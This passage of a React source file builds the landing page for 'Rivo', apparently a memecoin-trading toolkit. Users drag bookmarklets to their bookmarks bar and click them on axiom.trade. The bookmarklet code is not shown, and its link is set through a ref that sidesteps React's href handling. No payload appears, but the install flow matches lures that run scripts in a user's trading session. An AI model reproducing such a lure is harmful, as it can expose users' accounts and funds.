                      <path d="M0 143c18-9 24-16 38-12 14 3 18-16 30-12 13 3 20 22 32 10 12-13 15-37 30-30 14 7 21 27 34 16 12-10 20 0 34-8 14-7 24-37 35-24 12 15 15 35 30 19 14-15 23-31 35-17 12 14 20-12 32-2 13 11 14 20 26 3 12-16 24-17 34-28 10-12 22-1 29-10 9-12 24 3 36-12 12-16 17-21 35-23" fill="none" stroke="#c7adff" strokeWidth="2.5" />
                      <circle cx="423" cy="13" r="4" fill="#e8dcff" />
                    </svg>
                    <div className="chart-x-axis"><span>10:00</span><span>12:00</span><span>14:00</span><span>16:00</span></div>
                  </div>
                  <div className="terminal-footer-row"><span>VOL <b>$2.4M</b></span><span>LIQUIDITY <b>$841K</b></span><span>HOLDERS <b>4,280</b></span></div>
                </div>
              </div>
              <div className="rivo-overlay-card">
                <div className="overlay-card-top"><span className="overlay-card-icon"><Icon name="spark" size={15} /></span><span className="overlay-live-dot" /> <span>RIVO OVERLAY</span><span className="overlay-close">×</span></div>
                <div className="overlay-card-main"><strong>Signal detected</strong><span>$NOVA volume is moving</span></div>
                <div className="overlay-card-bottom"><span className="overlay-score">92 <small>/ 100</small></span><span className="overlay-score-label">MOMENTUM</span><span className="overlay-arrow"><Icon name="arrow-up-right" size={14} /></span></div>
              </div>
              <div className="stage-caption"><span className="stage-caption-dot" /> One click. On your chart.</div>
            </div>
          </section>

          <section id="features" className="tools-section">
            <div className="section-heading reveal-on-scroll">
              <div>
                <div className="eyebrow"><span className="eyebrow-line eyebrow-line-left" /> THE RIVO TOOLKIT</div>
                <h2>Six levers.<br /><em>One click away.</em></h2>
              </div>
              <div className="section-heading-side"><p>Built for the fast, messy, 24/7 pace of memecoin markets. Choose your edge, drag it to your bar, and keep your flow.</p><span className="drag-note"><Icon name="cursor" size={15} /> DRAG <i /> CLICK <i /> TRADE</span></div>
            </div>
            <div className="tools-grid">
              {tools.map((tool, index) => {
                const isPlaying = activeDemo === tool.id;
                const cardStyle = { '--tool-accent': tool.accent } as CSSProperties;
                return (
                  <article
                    key={tool.id}
                    className={`tool-card reveal-on-scroll reveal-delay-${(index % 3) + 1}${tool.locked ? ' is-locked' : ''}`}
                    style={cardStyle}
                  >
                    <div className="tool-card-top">
                      <div className="tool-icon"><Icon name={tool.icon} size={20} /></div>
                      <div className="tool-menu">
                        {tool.locked ? <span className="coming-badge"><Icon name="lock" size={11} /> Coming soon</span> : (
                          <>
                            <a className="menu-trigger" ref={(anchor) => { anchor?.setAttribute('href', buildBookmarklet(tool)); }} href="#bookmarklet" draggable="true" title={`Rivo | ${tool.name}`} aria-label={`Rivo | ${tool.name} — open menu or drag to bookmarks`} aria-expanded={activeMenu === tool.id} onClick={(event) => { event.preventDefault(); setActiveMenu((current) => current === tool.id ? null : tool.id); }} onDragStart={(event) => handleBookmarkDrag(event, tool)} onDragEnd={handleBookmarkDragEnd}><Icon name="menu" size={18} /><span className="menu-bookmark-label">Rivo | {tool.name}</span></a>
                            {activeMenu === tool.id && (
                              <div className="tool-dropdown">
                                <span className="dropdown-kicker">INSTALL THIS TOOL</span>
                                <a ref={(anchor) => { anchor?.setAttribute('href', buildBookmarklet(tool)); }} href="#bookmarklet" draggable="true" onClick={(event) => handleBookmarkClick(event, tool)} onDragStart={(event) => handleBookmarkDrag(event, tool)} onDragEnd={handleBookmarkDragEnd}><span className="dropdown-icon"><Icon name="bookmark" size={15} /></span><span><b>Drag to bookmarks bar</b><small>Drop it in your browser chrome</small></span><Icon name="arrow-up-right" size={14} /></a>
                                <button onClick={openHowItWorks}><span className="dropdown-icon"><Icon name="layers" size={15} /></span><span><b>How it works</b><small>Three steps to get started</small></span><Icon name="arrow-up-right" size={14} /></button>
                              </div>
                            )}
                          </>
                        )}
                      </div>
                    </div>
                    <div className="tool-title-row"><div><span className="tool-category">{tool.category}</span><h3>{tool.name}</h3></div><span className="tool-index">0{index + 1}</span></div>
                    <p className="tool-description">{tool.description}</p>
                    <div className={`tool-preview tool-preview-${tool.preview}`}>
                      {renderPreview(tool, isPlaying)}
                      <button className={`preview-play${tool.locked ? ' preview-play-disabled' : ''}`} disabled={tool.locked} aria-label={`${isPlaying ? 'Pause' : 'Play'} ${tool.name} demo`} onClick={() => setActiveDemo(isPlaying ? null : tool.id)}><Icon name={isPlaying ? 'pause' : 'play'} size={12} /></button>
                    </div>
                    <div className="tool-card-footer"><span><i className="status-dot" /> {tool.locked ? 'In development' : 'Bookmarklet ready'}</span>{tool.locked ? <Icon name="lock" size={14} /> : <span className="footer-arrow"><Icon name="arrow-up-right" size={14} /></span>}</div>
                  </article>
                );
              })}
            </div>
          </section>

          <BorderGlow
            edgeSensitivity={30}
            glowColor="260 80 76"
            backgroundColor="#120F17"
            borderRadius={25}
            glowRadius={40}
            glowIntensity={1}
            coneSpread={25}
            animated={false}
            colors={['#c084fc', '#f472b6', '#38bdf8']}
            className="coming-border-glow reveal-on-scroll"
          >
            <section id="coming-soon" className="coming-section">
              <div className="coming-glow" />
              <div className="coming-copy"><div className="eyebrow"><span className="eyebrow-dot eyebrow-dot-orange" /> OUR BEST TOOL</div><h2>Your Complete Tracking Platform.</h2><p>Track social signals, detect contracts instantly, and organize feeds exactly how you want.</p><a className="button button-primary" href="https://x.com" target="_blank" rel="noreferrer">Follow @Rivo on X <Icon name="external" size={15} /></a></div>
              <div className="roadmap-card roadmap-video-card"><video autoPlay loop muted playsInline preload="metadata" aria-label="RivoVision preview"><source src="/video-2-custom-twitter.mp4" type="video/mp4" /></video></div>
            </section>
          </BorderGlow>

          <section className="install-strip reveal-on-scroll">
            <div className="install-strip-icon"><Icon name="bookmark" size={22} /></div>
            <div><span className="install-strip-kicker">THE RIVO LOOP</span><h2>Keep your edge in the tab.</h2></div>
            <div className="install-strip-steps"><span><b>01</b> Drag</span><i /> <span><b>02</b> Open Axiom</span><i /> <span><b>03</b> Click</span></div>
            <button className="strip-button" onClick={openHowItWorks}>Read the docs <Icon name="arrow-up-right" size={15} /></button>
          </section>
        </main>

        <footer className="site-footer">
          <div className="footer-brand"><LogoMark small /><div><span className="brand-name">Rivo<span className="brand-dot">.</span></span><p>A companion toolkit for the fast lane.</p></div></div>
          <div className="footer-links"><a href="https://x.com/rivo" target="_blank" rel="noreferrer"><Icon name="x" size={14} /> X / Twitter</a><button onClick={openHowItWorks}><Icon name="layers" size={14} /> Docs</button></div>
          <span className="footer-copyright">© 2026 Rivo Tools</span>
        </footer>
      </div>

      {isHowOpen && (
        <div className="modal-backdrop" role="presentation" onMouseDown={(event) => { if (event.target === event.currentTarget) setIsHowOpen(false); }}>
          <div className="how-modal" role="dialog" aria-modal="true" aria-labelledby="how-modal-title">
            <div className="modal-topline"><span className="eyebrow"><span className="eyebrow-dot" /> RIVO DOCS</span><button className="modal-close" aria-label="Close how it works dialog" onClick={() => setIsHowOpen(false)}><Icon name="close" size={18} /></button></div>
            <h2 id="how-modal-title">Your tools,<br /><em>where you trade.</em></h2>
            <p className="modal-intro">Rivo runs as a bookmarklet. No new terminal, no tab hopping, no account setup. Just the signal you need, on top of Axiom.</p>
            <div className="how-steps"><div className="how-step"><span className="step-number">01</span><span className="step-icon"><Icon name="bookmark" size={18} /></span><div><h3>Drag a tool</h3><p>Show your bookmarks bar, then open any tool menu and drag its install link there.</p><div className="shortcut-hint"><span className="shortcut-label">SHOW BOOKMARKS BAR</span><div className="shortcut-options"><span className="shortcut-option"><b>Windows</b><kbd>Ctrl</kbd><i>+</i><kbd>Shift</kbd><i>+</i><kbd>B</kbd></span><span className="shortcut-option"><b>Mac</b><kbd>Cmd</kbd><i>+</i><kbd>Shift</kbd><i>+</i><kbd>B</kbd></span></div></div></div></div><div className="how-step"><span className="step-number">02</span><span className="step-icon"><Icon name="layers" size={18} /></span><div><h3>Open axiom.trade</h3><p>Keep trading exactly as you do now. Rivo only activates on Axiom.trade.</p></div></div><div className="how-step"><span className="step-number">03</span><span className="step-icon"><Icon name="cursor" size={18} /></span><div><h3>Click to activate</h3><p>Hit the bookmark and the Rivo overlay appears directly over your current chart.</p></div></div></div>
            <div className="modal-note"><Icon name="shield" size={16} /><span>Every bookmarklet includes an Axiom.trade safety check before it runs.</span></div>
          </div>
        </div>
      )}

      {toast && <div className="toast" role="status" aria-live="polite"><span className="toast-check"><Icon name="check" size={13} /></span>{toast}<button onClick={() => setToast(null)} aria-label="Dismiss notification"><Icon name="close" size={13} /></button></div>}
    </div>
  );
}

export default App;
